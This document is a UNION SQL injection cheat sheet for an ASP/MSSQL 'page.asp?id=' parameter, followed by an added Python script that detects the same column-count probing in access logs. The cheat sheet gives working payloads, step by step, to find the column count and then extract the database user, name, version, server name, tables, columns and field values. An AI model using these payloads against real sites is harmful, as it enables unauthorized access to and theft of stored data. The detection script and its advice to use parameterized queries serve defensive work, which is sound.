UNION SQL INJECTION - DETECTION
Integer Injection:
http://[site]/page.asp?id=1 UNION SELECT ALL 1--
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--
NO ERROR
UNION SQL INJECTION - EXTRACT DATABASE USER
http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4--
[DB USER]
UNION SQL INJECTION - EXTRACT DATABASE NAME
http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME(),3,4--
[DB NAME]
UNION SQL INJECTION - EXTRACT DATABASE VERSION
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4--
[DB VERSION]
UNION SQL INJECTION - EXTRACT SERVER NAME
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@SERVERNAME,3,4--
[SERVER NAME]
UNION SQL INJECTION - EXTRACT DATABASE TABLES
http://[site]/page.asp?id=1 UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)--
[TABLE NAME 1]
UNION SQL INJECTION - EXTRACT TABLE COLUMN NAMES
http://[site]/page.asp?id=1 UNION SELECT ALL 1,column_name,3,4 from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--
[COLUMN NAME 1]
UNION SQL INJECTION - EXTRACT 1st FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from TABLE-NAME-1--
[FIELD 1 VALUE]
UNION SQL INJECTION - EXTRACT 2nd FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1--
[FIELD 2 VALUE]
UNION SQL INJECTION - EXTRACT 3rd FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from TABLE-NAME-1--
[FIELD 3 VALUE]
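An added detection example in Python, not part of this cheat sheet: it reads constructed access-log lines, pulls UNION SELECT payloads out of decoded query parameters, measures the select-list width the same way the column-count probe above increments it (FROM-based extraction queries included), and flags a client whose widths climb request by request until one returns 200, the NO ERROR step. The log line format, status codes and IP addresses are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log sample (not real traffic): client, request line, status.
# 10.0.0.5 walks the column-count probe above; 500 = error page, 200 = NO ERROR.
SAMPLE_LOG = """\
10.0.0.5 "GET /page.asp?id=1%20UNION%20SELECT%20ALL%201-- HTTP/1.1" 500
10.0.0.5 "GET /page.asp?id=1%20UNION%20SELECT%20ALL%201,2-- HTTP/1.1" 500
10.0.0.5 "GET /page.asp?id=1%20UNION%20SELECT%20ALL%201,2,3-- HTTP/1.1" 500
10.0.0.5 "GET /page.asp?id=1%20UNION%20SELECT%20ALL%201,2,3,4-- HTTP/1.1" 200
10.0.0.7 "GET /page.asp?id=42 HTTP/1.1" 200
"""

LOG_RE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" (\d{3})$')
# UNION [ALL] SELECT [ALL|DISTINCT] <select list>; matched on the decoded value.
UNION_RE = re.compile(
    r'\bUNION\b(?:\s+ALL)?\s+SELECT\b(?:\s+(?:ALL|DISTINCT)\b)?(.*)', re.I | re.S)

def select_list_width(tail):
    """Top-level comma-separated expressions after SELECT, up to FROM or a
    comment marker; commas inside parentheses such as char(85) do not split."""
    body = re.split(r'\bFROM\b|--|/\*', tail, maxsplit=1, flags=re.I)[0]
    depth, count = 0, 1
    for ch in body:
        depth += (ch == '(') - (ch == ')')
        count += (ch == ',' and depth == 0)
    return count

def scan_log(text):
    """Per client: (parameter, select-list width, status) for each request whose
    decoded query-string value carries a UNION SELECT."""
    findings = defaultdict(list)
    for m in filter(None, map(LOG_RE.match, text.splitlines())):
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            u = UNION_RE.search(value)  # parse_qsl already percent-decodes
            if u:
                findings[client].append((name, select_list_width(u.group(1)), status))
    return dict(findings)

def column_count_probing(findings, min_steps=3):
    """Clients whose UNION widths climb one request after another (the
    enumeration sequence above), mapped to the first width that returned 200."""
    alerts = {}
    for client, hits in findings.items():
        widths = [w for _, w, _ in hits]
        if len(widths) >= min_steps and all(b > a for a, b in zip(widths, widths[1:])):
            ok = [w for _, w, s in hits if s == 200]
            alerts[client] = ok[0] if ok else None
    return alerts
```

The width that first returns 200 is the real column count of the vulnerable query, so that value alone tells a responder which statement in page.asp to fix with a parameterized query.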